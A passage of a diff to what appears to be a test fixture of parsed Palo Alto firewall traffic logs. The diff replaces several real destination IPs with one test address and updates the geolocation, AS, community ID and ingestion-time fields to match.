04:39:54,25349,1,52189,53,0,0,0x0,udp,allow,227,86,141,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", "panw": { "panos": { "ruleset": "rule1", @@ -6209,7 +6215,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:1CvVfwyezBZcR2u+VcrEzfuQK9s=", + "community_id": "1:OzPcYfTB9qZdptdWIWtui31Th2Q=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -6241,14 +6247,14 @@ "related": { "ip": [ "192.168.0.100", - "8.8.8.8", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284100488Z", - "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,8.8.8.8,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25349,1,52189,53,0,0,0x0,udp,allow,227,86,141,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", + "ingested": "2021-12-09T13:43:22.381864600Z", + "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,end,1,2012/04/10 04:39:54,192.168.0.100,175.16.199.1,0.0.0.0,0.0.0.0,rule1,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25349,1,52189,53,0,0,0x0,udp,allow,227,86,141,2,2012/04/10 04:39:24,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -6271,27 +6277,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -6310,7 +6315,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25713,1,59300,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25713,1,59300,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -6344,7 +6349,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:YDMNSbru670DK5EMT3E28WFJPz4=", + "community_id": "1:jTZdxPnMPc+sLaxgXFcrsz+OuvQ=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -6382,14 +6387,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284105240Z", - "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25713,1,59300,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381867900Z", + "original": "Oct 30 09:46:22 1,2012/10/30 09:46:22,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,25713,1,59300,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:54,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:22.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -6412,24 +6417,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -6448,7 +6455,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,26499,1,54414,53,0,0,0x200000,udp,allow,73,73,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,26499,1,54414,53,0,0,0x200000,udp,allow,73,73,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -6482,7 +6489,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:K6PPTb7ohj/4wQV86uCrgAF1mcY=", + "community_id": "1:HfZACBDWHwkWPdpUmvEFlSZI2N4=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -6520,14 +6527,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284109909Z", - "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,26499,1,54414,53,0,0,0x200000,udp,allow,73,73,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381872100Z", + "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:54,26499,1,54414,53,0,0,0x200000,udp,allow,73,73,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -6550,27 +6557,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 0, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -6589,7 +6595,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25437,1,59299,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25437,1,59299,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -6623,7 +6629,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:C9009xCOuCuGvMPT4caMCizoYr0=", + "community_id": "1:H2dYyEhLqvaoBzgcR4r/ZZbNhd0=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -6661,14 +6667,14 @@ ], "ip": [ "192.168.0.2", - "204.232.231.46", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284114480Z", - "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,204.232.231.46,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25437,1,59299,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381877500Z", + "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25437,1,59299,80,0,0,0x200000,tcp,allow,78,78,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -6691,24 +6697,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 0, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 0 }, "rule": { @@ -6727,7 +6735,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24848,1,60399,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24848,1,60399,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "panw": { "panos": { "ruleset": "rule1", @@ -6761,7 +6769,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:BKNHj3e0QZpWJwLNiG4yqJnbrxk=", + "community_id": "1:Np5F1DWIEE3wK6sFzX70T4DJpZ8=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -6799,14 +6807,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284119132Z", - "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24848,1,60399,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", + "ingested": "2021-12-09T13:43:22.381882800Z", + "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,start,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24848,1,60399,53,0,0,0x200000,udp,allow,80,80,0,1,2012/04/10 04:39:53,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,0", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -6829,24 +6837,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 316, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 2 }, "rule": { @@ -6865,7 +6875,7 @@ }, "packets": 2 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24924,1,59626,53,0,0,0x200000,udp,allow,482,166,316,4,2012/04/10 04:39:22,1,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,2,2", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24924,1,59626,53,0,0,0x200000,udp,allow,482,166,316,4,2012/04/10 04:39:22,1,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,2,2", "panw": { "panos": { "ruleset": "rule1", @@ -6899,7 +6909,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:RQ3lmwvSayYq24fFbjpDDqDG+Dg=", + "community_id": "1:NOOR09ywg6eb7+6pti9Pn/rRnjU=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -6937,14 +6947,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 1000000000, - "ingested": "2021-09-08T12:38:09.284123814Z", - "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24924,1,59626,53,0,0,0x200000,udp,allow,482,166,316,4,2012/04/10 04:39:22,1,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,2,2", + "ingested": "2021-12-09T13:43:22.381886700Z", + "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24924,1,59626,53,0,0,0x200000,udp,allow,482,166,316,4,2012/04/10 04:39:22,1,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,2,2", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -6967,24 +6977,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 121, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -7003,7 +7015,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25899,1,51542,53,0,0,0x200000,udp,allow,196,75,121,2,2012/04/10 04:39:23,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25899,1,51542,53,0,0,0x200000,udp,allow,196,75,121,2,2012/04/10 04:39:23,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", "panw": { "panos": { "ruleset": "rule1", @@ -7037,7 +7049,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:g5ixoTtR3QVz4le7g1L6PZ67CmU=", + "community_id": "1:4e3Ijfb0Ykh/X94M8iPcJ/4x+Hs=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -7075,14 +7087,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284128833Z", - "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25899,1,51542,53,0,0,0x200000,udp,allow,196,75,121,2,2012/04/10 04:39:23,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", + "ingested": "2021-12-09T13:43:22.381891200Z", + "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25899,1,51542,53,0,0,0x200000,udp,allow,196,75,121,2,2012/04/10 04:39:23,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -7105,24 +7117,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", + "region_name": "Jilin", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 209, + "number": 4837, "organization": { - "name": "CenturyLink Communications, LLC" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 53, "bytes": 169, - "ip": "205.171.2.25", + "ip": "175.16.199.1", "packets": 1 }, "rule": { @@ -7141,7 +7155,7 @@ }, "packets": 1 }, - "message": "192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26066,1,54182,53,0,0,0x200000,udp,allow,244,75,169,2,2012/04/10 04:39:23,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26066,1,54182,53,0,0,0x200000,udp,allow,244,75,169,2,2012/04/10 04:39:23,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", "panw": { "panos": { "ruleset": "rule1", @@ -7175,7 +7189,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:z0genl/l2JGIJaNTqaSLGCLTlo4=", + "community_id": "1:7kYPEtIXJPdKxeRfBwZbUnCqPL8=", "transport": "udp", "application": "dns", "type": "ipv4", @@ -7213,14 +7227,14 @@ ], "ip": [ "192.168.0.2", - "205.171.2.25", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284133439Z", - "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,205.171.2.25,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26066,1,54182,53,0,0,0x200000,udp,allow,244,75,169,2,2012/04/10 04:39:23,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", + "ingested": "2021-12-09T13:43:22.381896600Z", + "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,26066,1,54182,53,0,0,0x200000,udp,allow,244,75,169,2,2012/04/10 04:39:23,0,any,0,0,0x0,192.168.0.0-192.168.255.255,United States,0,1,1", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -7243,24 +7257,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "Europe", - "country_name": "Italy", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "Italy", + "region_name": "Jilin", "location": { - "lon": 12.1097, - "lat": 43.1479 - }, - "country_iso_code": "IT" + "lon": 125.3228, + "lat": 43.88 + } }, "as": { - "number": 3269, + "number": 4837, "organization": { - "name": "Telecom Italia" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 954, - "ip": "62.211.68.12", + "ip": "175.16.199.1", "packets": 7 }, "rule": { @@ -7279,7 +7295,7 @@ }, "packets": 6 }, - "message": "192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24908,1,59199,80,0,0,0x200000,tcp,allow,1548,594,954,13,2012/04/10 04:39:23,0,business-and-economy,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24908,1,59199,80,0,0,0x200000,tcp,allow,1548,594,954,13,2012/04/10 04:39:23,0,business-and-economy,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7", "panw": { "panos": { "ruleset": "rule1", @@ -7313,7 +7329,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:cIfWskY1iVpg8gxVVTX1K8A7+MA=", + "community_id": "1:n043Ys2XoO8bLJn3K+Zo1644RIQ=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -7351,14 +7367,14 @@ ], "ip": [ "192.168.0.2", - "62.211.68.12", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 0, - "ingested": "2021-09-08T12:38:09.284138047Z", - "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,62.211.68.12,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24908,1,59199,80,0,0,0x200000,tcp,allow,1548,594,954,13,2012/04/10 04:39:23,0,business-and-economy,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7", + "ingested": "2021-12-09T13:43:22.381900600Z", + "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,24908,1,59199,80,0,0,0x200000,tcp,allow,1548,594,954,13,2012/04/10 04:39:23,0,business-and-economy,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,6,7", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -7381,27 +7397,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "Europe", - "region_iso_code": "IT-MI", - "city_name": "Assago", - "country_iso_code": "IT", - "country_name": "Italy", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "Italy", - "region_name": "Milan", + "region_name": "Jilin", "location": { - "lon": 9.1225, - "lat": 45.4087 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 8660, + "number": 4837, "organization": { - "name": "Italiaonline S.p.A." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 9130, - "ip": "212.48.10.58", + "ip": "175.16.199.1", "packets": 10 }, "rule": { @@ -7420,7 +7435,7 @@ }, "packets": 12 }, - "message": "192.168.0.2,212.48.10.58,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25105,1,59198,80,0,0,0x200000,tcp,allow,10135,1005,9130,22,2012/04/10 04:39:21,2,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,10", + "message": "192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25105,1,59198,80,0,0,0x200000,tcp,allow,10135,1005,9130,22,2012/04/10 04:39:21,2,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,10", "panw": { "panos": { "ruleset": "rule1", @@ -7454,7 +7469,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:UPWyVvocuULCMUmJlrn6XBha7JE=", + "community_id": "1:0qidnnbIN4o+tL4aZCeOAxWOD7o=", "transport": "tcp", "application": "web-browsing", "type": "ipv4", @@ -7492,14 +7507,14 @@ ], "ip": [ "192.168.0.2", - "212.48.10.58", + "175.16.199.1", "0.0.0.0" ] }, "event": { "duration": 2000000000, - "ingested": "2021-09-08T12:38:09.284142660Z", - "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,212.48.10.58,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25105,1,59198,80,0,0,0x200000,tcp,allow,10135,1005,9130,22,2012/04/10 04:39:21,2,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,10", + "ingested": "2021-12-09T13:43:22.381904700Z", + "original": "Oct 30 09:46:27 1,2012/10/30 09:46:27,01606001116,TRAFFIC,end,1,2012/04/10 04:39:53,192.168.0.2,175.16.199.1,0.0.0.0,0.0.0.0,rule1,crusher,,web-browsing,vsys1,trust,untrust,ethernet1/2,ethernet1/1,forwardAll,2012/04/10 04:39:53,25105,1,59198,80,0,0,0x200000,tcp,allow,10135,1005,9130,22,2012/04/10 04:39:21,2,search-engines,0,0,0x0,192.168.0.0-192.168.255.255,Italy,0,12,10", "created": "2012-10-30T09:46:27.000-04:00", "timezone": "America/New_York", "kind": "event", @@ -7522,27 +7537,26 @@ "destination": { "nat": {}, "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Fort Lauderdale", - "country_iso_code": "US", - "country_name": "United States", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_iso_code": "CN", + "country_name": "China", "name": "United States", - "region_name": "Florida", + "region_name": "Jilin", "location": { - "lon": -80.1749, - "lat": 26.1792 + "lon": 125.3228, + "lat": 43.88 } }, "as": { - "number": 27357, + "number": 4837, "organization": { - "name": "Rackspace Hosting" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 80, "bytes": 555, - "ip": "204.232.231.46", + "ip": "175.16.199.1", "packets": 3 }, "rule": { @@ -7561,7 +7575,7 @@ }, "packets": 18 }, - "message": 